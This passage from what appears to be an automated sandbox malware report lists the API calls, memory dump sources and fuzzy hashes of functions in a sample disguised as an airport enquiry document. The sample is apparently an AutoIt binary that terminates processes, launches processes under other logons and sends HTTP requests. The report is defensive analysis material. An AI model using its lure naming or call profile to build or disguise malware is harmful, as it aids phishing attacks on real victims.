            • EnableWindow.USER32(?,00000000), ref: 00D0B9F0
            • ShowWindow.USER32(00D467B0,00000000,01655828,?,?,00D467B0,?,00D0B862,?,?), ref: 00D0BA50
            • ShowWindow.USER32(?,00000004,?,00D0B862,?,?), ref: 00D0BA62
            • EnableWindow.USER32(?,00000001), ref: 00D0BA86
            • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00D0BAA9
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Window$Show$Enable$MessageSend
            • String ID:
            • API String ID: 642888154-0
            • Opcode ID: b5ee691ac59416f61125cf623f0fbefc53d8acf22056cca81955ad1f35e85e4a
            • Instruction ID: ea3b48fca2240a7c8b0cec4aa9cd633615bdc9237a0469810be20156285a411e
            • Opcode Fuzzy Hash: b5ee691ac59416f61125cf623f0fbefc53d8acf22056cca81955ad1f35e85e4a
            • Instruction Fuzzy Hash: 81414E30604641AFDB22CF19D489B957BE0FB05320F1C42AAEA4C8F6A2C771A845CB71
            APIs
            • GetForegroundWindow.USER32(?,?,?,?,?,?,00CF5134,?,?,00000000,00000001), ref: 00CF73BF
              • Part of subcall function 00CF3C94: GetWindowRect.USER32(?,?), ref: 00CF3CA7
            • GetDesktopWindow.USER32 ref: 00CF73E9
            • GetWindowRect.USER32(00000000), ref: 00CF73F0
            • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00CF7422
              • Part of subcall function 00CE54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00CE555E
            • GetCursorPos.USER32(?), ref: 00CF744E
            • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00CF74AC
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
            • String ID:
            • API String ID: 4137160315-0
            • Opcode ID: 3ac63eb4220ed449a00458eb8712d506e2e0d4f56da9fc2cd3240941246bbec6
            • Instruction ID: 7efc97fcfd72a498d9c43fbb003e0b84f0f672b98cea9fc99318859d493eecd0
            • Opcode Fuzzy Hash: 3ac63eb4220ed449a00458eb8712d506e2e0d4f56da9fc2cd3240941246bbec6
            • Instruction Fuzzy Hash: 9431D472508309ABD720DF14DC49F6BBBA9FF88314F100A19F599D7191CA70EA09CB92
            APIs
              • Part of subcall function 00CD85F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00CD8608
              • Part of subcall function 00CD85F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00CD8612
              • Part of subcall function 00CD85F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00CD8621
              • Part of subcall function 00CD85F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00CD8628
              • Part of subcall function 00CD85F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00CD863E
            • GetLengthSid.ADVAPI32(?,00000000,00CD8977), ref: 00CD8DAC
            • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00CD8DB8
            • HeapAlloc.KERNEL32(00000000), ref: 00CD8DBF
            • CopySid.ADVAPI32(00000000,00000000,?), ref: 00CD8DD8
            • GetProcessHeap.KERNEL32(00000000,00000000,00CD8977), ref: 00CD8DEC
            • HeapFree.KERNEL32(00000000), ref: 00CD8DF3
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
            • String ID:
            • API String ID: 3008561057-0
            • Opcode ID: 21fc1a32c40dfbceff37fde892788e2b03b10004220260c633ddcb090ef983c4
            • Instruction ID: 91acbe6aa6cd8bbe32e31dbdd9d5906f7c14ad15ee29a465c0d2861100892a0b
            • Opcode Fuzzy Hash: 21fc1a32c40dfbceff37fde892788e2b03b10004220260c633ddcb090ef983c4
            • Instruction Fuzzy Hash: A811CD31500706EBDB209F64CC08BAE77BAEB54315F20402AE989D3390CB319A08CB70
            APIs
            • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00CD8B2A
            • OpenProcessToken.ADVAPI32(00000000), ref: 00CD8B31
            • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00CD8B40
            • CloseHandle.KERNEL32(00000004), ref: 00CD8B4B
            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00CD8B7A
            • DestroyEnvironmentBlock.USERENV(00000000), ref: 00CD8B8E
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
            • String ID:
            • API String ID: 1413079979-0
            • Opcode ID: ac82dc91329c3a372000929381e656e2f51a5298055836cb4f67e283d4aaa1fa
            • Instruction ID: c1fc1088ad9f3768022dc43e849b3d47d5090cb96002c2f0934ba3f3e46aa188
            • Opcode Fuzzy Hash: ac82dc91329c3a372000929381e656e2f51a5298055836cb4f67e283d4aaa1fa
            • Instruction Fuzzy Hash: B1115CB2500209BBDF118FA4DD49FDE7BA9EF48704F144066FE04E2260C7719E659B61
            APIs
              • Part of subcall function 00C812F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00C8134D
              • Part of subcall function 00C812F3: SelectObject.GDI32(?,00000000), ref: 00C8135C
              • Part of subcall function 00C812F3: BeginPath.GDI32(?), ref: 00C81373
              • Part of subcall function 00C812F3: SelectObject.GDI32(?,00000000), ref: 00C8139C
            • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00D0C1C4
            • LineTo.GDI32(00000000,00000003,?), ref: 00D0C1D8
            • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00D0C1E6
            • LineTo.GDI32(00000000,00000000,?), ref: 00D0C1F6
            • EndPath.GDI32(00000000), ref: 00D0C206
            • StrokePath.GDI32(00000000), ref: 00D0C216
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
            • String ID:
            • API String ID: 43455801-0
            • Opcode ID: 803105576e8b05db5768a0fb925dfcdcc40d1fa7da2368ea96f0c67353ce5e35
            • Instruction ID: 5af88a124908990bfcc014e0797302cce4dcc8655b3dbb123048eeca904f7c75
            • Opcode Fuzzy Hash: 803105576e8b05db5768a0fb925dfcdcc40d1fa7da2368ea96f0c67353ce5e35
            • Instruction Fuzzy Hash: 50111B7640020CBFDF119F90DC88FAA7FADEB09354F148021BE198A6A1C7719D55DBB0
            APIs
            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00CA03D3
            • MapVirtualKeyW.USER32(00000010,00000000), ref: 00CA03DB
            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00CA03E6
            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00CA03F1
            • MapVirtualKeyW.USER32(00000011,00000000), ref: 00CA03F9
            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00CA0401
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Virtual
            • String ID:
            • API String ID: 4278518827-0
            • Opcode ID: 5bb68a8f6bdc3e938e10ec3efaa2cb3eb4035f9789285c42e84edc174679f445
            • Instruction ID: aac3c0dc5b3d1d5de73eaccc6ea5dcbb1de84391e8d89a8da181f5f51642f650
            • Opcode Fuzzy Hash: 5bb68a8f6bdc3e938e10ec3efaa2cb3eb4035f9789285c42e84edc174679f445
            • Instruction Fuzzy Hash: 00016CB09017597DE3008F5A8C85B52FFA8FF19354F00411BA15C87A41C7F5A864CBE5
            APIs
            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00CE569B
            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00CE56B1
            • GetWindowThreadProcessId.USER32(?,?), ref: 00CE56C0
            • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00CE56CF
            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00CE56D9
            • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00CE56E0
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
            • String ID:
            • API String ID: 839392675-0
            • Opcode ID: ca463c3eb6241f02a84cd77ffe29c8060977c6445ee215a921dbf487a990cb0b
            • Instruction ID: 518a34f7478fd5ad5508cfc98ee7ac4c7ca8d3f34dbfcee6bbfc01084c1e1b3f
            • Opcode Fuzzy Hash: ca463c3eb6241f02a84cd77ffe29c8060977c6445ee215a921dbf487a990cb0b
            • Instruction Fuzzy Hash: EFF01D32241258BBE7315BA29C0DFAB7A7CEBC6B11F500169FA08D1650DAA11A0186B5
            APIs
            • InterlockedExchange.KERNEL32(?,?), ref: 00CE74E5
            • EnterCriticalSection.KERNEL32(?,?,00C91044,?,?), ref: 00CE74F6
            • TerminateThread.KERNEL32(00000000,000001F6,?,00C91044,?,?), ref: 00CE7503
            • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00C91044,?,?), ref: 00CE7510
              • Part of subcall function 00CE6ED7: CloseHandle.KERNEL32(00000000,?,00CE751D,?,00C91044,?,?), ref: 00CE6EE1
            • InterlockedExchange.KERNEL32(?,000001F6), ref: 00CE7523
            • LeaveCriticalSection.KERNEL32(?,?,00C91044,?,?), ref: 00CE752A
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
            • String ID:
            • API String ID: 3495660284-0
            • Opcode ID: ec439a5a9c12a38e4e86dc2d72b8ac12e14252b204a33bf49108f0721277cda0
            • Instruction ID: b66a0fbe68d65ee7c54f1756a4bacfaaba56cf5f87aa45ca9a020142c1bed6f9
            • Opcode Fuzzy Hash: ec439a5a9c12a38e4e86dc2d72b8ac12e14252b204a33bf49108f0721277cda0
            • Instruction Fuzzy Hash: C0F05E3A141712EBDB212B74FC8CAEB7B2AEF45302B200635F246D19B4CB755901CBA4
            APIs
            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00CD8E7F
            • UnloadUserProfile.USERENV(?,?), ref: 00CD8E8B
            • CloseHandle.KERNEL32(?), ref: 00CD8E94
            • CloseHandle.KERNEL32(?), ref: 00CD8E9C
            • GetProcessHeap.KERNEL32(00000000,?), ref: 00CD8EA5
            • HeapFree.KERNEL32(00000000), ref: 00CD8EAC
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
            • String ID:
            • API String ID: 146765662-0
            • Opcode ID: 07bd949a5ec2ae05b5094aeeb48ea093c1948bd93f2c05ec39dddc875da3856a
            • Instruction ID: 85b25c31c9a1b3a985bc56efc4cd4b0370f35e765e6f10f8948eb7b09e3e28cf
            • Opcode Fuzzy Hash: 07bd949a5ec2ae05b5094aeeb48ea093c1948bd93f2c05ec39dddc875da3856a
            • Instruction Fuzzy Hash: 62E0C236004301FBDA115FE1EC0CA0ABB79FB99722B208230F219C1A70CB32A461DBA1
            APIs
            • VariantInit.OLEAUT32(?), ref: 00CF8928
            • CharUpperBuffW.USER32(?,?), ref: 00CF8A37
            • VariantClear.OLEAUT32(?), ref: 00CF8BAF
              • Part of subcall function 00CE7804: VariantInit.OLEAUT32(00000000), ref: 00CE7844
              • Part of subcall function 00CE7804: VariantCopy.OLEAUT32(00000000,?), ref: 00CE784D
              • Part of subcall function 00CE7804: VariantClear.OLEAUT32(00000000), ref: 00CE7859
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Variant$ClearInit$BuffCharCopyUpper
            • String ID: AUTOIT.ERROR$Incorrect Parameter format
            • API String ID: 4237274167-1221869570
            • Opcode ID: 891ea0345b714202910647ee80d3116df108f6b8e29c54ba713d87339eb70e57
            • Instruction ID: eabec6bf555a4096e573d28027bbe6898ef45541d6f6220470c0d78a36c56c29
            • Opcode Fuzzy Hash: 891ea0345b714202910647ee80d3116df108f6b8e29c54ba713d87339eb70e57
            • Instruction Fuzzy Hash: FF91AF716083059FC750EF24C88196ABBE4EF88304F14496EF99A8B361DB30E90ADB52
            APIs
              • Part of subcall function 00C9FEC6: _wcscpy.LIBCMT ref: 00C9FEE9
            • _memset.LIBCMT ref: 00CE3077
            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00CE30A6
            • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00CE3159
            • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00CE3187
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ItemMenu$Info$Default_memset_wcscpy
            • String ID: 0
            • API String ID: 4152858687-4108050209
            • Opcode ID: 28689ebf6d09888c7907e0798b037e254eb144fb4ac7dff0c5fd714fec98d55f
            • Instruction ID: 6dd9a6664c56044b6009f9edee8c8e51711176ad4357dba25e4e725c2a9bf31a
            • Opcode Fuzzy Hash: 28689ebf6d09888c7907e0798b037e254eb144fb4ac7dff0c5fd714fec98d55f
            • Instruction Fuzzy Hash: AC51C0316083C19BD7259F2AC849A6FB7E8EF45364F04092DF8A5D32A1DB70EF449752
            APIs
            • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00CDDAC5
            • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00CDDAFB
            • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00CDDB0C
            • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00CDDB8E
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ErrorMode$AddressCreateInstanceProc
            • String ID: DllGetClassObject
            • API String ID: 753597075-1075368562
            • Opcode ID: 7e26349916d32be09a0e175f2ba82075c8af04f2bdf4caf8cb1eba2573ad68bc
            • Instruction ID: dd8f3580c657e5f49e78ee1b95458cb89152efd898ebecf14a15558ebcb6a4d3
            • Opcode Fuzzy Hash: 7e26349916d32be09a0e175f2ba82075c8af04f2bdf4caf8cb1eba2573ad68bc
            • Instruction Fuzzy Hash: 1A4150B1A00304EFDB15CF55C884A9ABBA9EF44354F1581ABAE0A9F305D7B1DA44DBA0
            APIs
            • _memset.LIBCMT ref: 00CE2CAF
            • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00CE2CCB
            • DeleteMenu.USER32(?,00000007,00000000), ref: 00CE2D11
            • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00D46890,00000000), ref: 00CE2D5A
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Menu$Delete$InfoItem_memset
            • String ID: 0
            • API String ID: 1173514356-4108050209
            • Opcode ID: 95b8c00ec9f70d14c8de6125b371b06b78b71048d9e077c606e5d0f86e4f67f0
            • Instruction ID: 3255aa49830f20ed96440d218e98e90637c0a3e397fd41dd968702cbc6303b07
            • Opcode Fuzzy Hash: 95b8c00ec9f70d14c8de6125b371b06b78b71048d9e077c606e5d0f86e4f67f0
            • Instruction Fuzzy Hash: A7418E702043829FD724DF25DC45B1ABBE9EF85320F14461DFA65D7291D770EA04CBA2
            APIs
            • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00CFDAD9
              • Part of subcall function 00C879AB: _memmove.LIBCMT ref: 00C879F9
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: BuffCharLower_memmove
            • String ID: cdecl$none$stdcall$winapi
            • API String ID: 3425801089-567219261
            • Opcode ID: 7b13614c7bb67a0f9d5b2ec9b80b88e7d9a16cd94cc21007817d1a4e0017c19c
            • Instruction ID: 021aaefb0214a5cdaa46cb201e50b90c55f97d85a7ae623e1205618c578713b9
            • Opcode Fuzzy Hash: 7b13614c7bb67a0f9d5b2ec9b80b88e7d9a16cd94cc21007817d1a4e0017c19c
            • Instruction Fuzzy Hash: 3931AE7190021AABCF00EF54C8809BEB3B5FF05314B10862AE936977D1DB71EA06DB90
            APIs
              • Part of subcall function 00C87F41: _memmove.LIBCMT ref: 00C87F82
              • Part of subcall function 00CDB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00CDB0E7
            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00CD93F6
            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00CD9409
            • SendMessageW.USER32(?,00000189,?,00000000), ref: 00CD9439
              • Part of subcall function 00C87D2C: _memmove.LIBCMT ref: 00C87D66
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: MessageSend$_memmove$ClassName
            • String ID: ComboBox$ListBox
            • API String ID: 365058703-1403004172
            • Opcode ID: a8e82a16ef6c018f87ffef3358fe631e80ff2d1792baac174923096230b7c2ae
            • Instruction ID: 36c75aab37acacc9632b8183dd3d119f8c20897ef73799946d59f3820d36149b
            • Opcode Fuzzy Hash: a8e82a16ef6c018f87ffef3358fe631e80ff2d1792baac174923096230b7c2ae
            • Instruction Fuzzy Hash: A0210175900204AEDB14ABB0CC859FFB768DF05364B20422AFA25972E1DB355E0AA720
            APIs
            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00CF1B40
            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00CF1B66
            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00CF1B96
            • InternetCloseHandle.WININET(00000000), ref: 00CF1BDD
              • Part of subcall function 00CF2777: GetLastError.KERNEL32(?,?,00CF1B0B,00000000,00000000,00000001), ref: 00CF278C
              • Part of subcall function 00CF2777: SetEvent.KERNEL32(?,?,00CF1B0B,00000000,00000000,00000001), ref: 00CF27A1
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
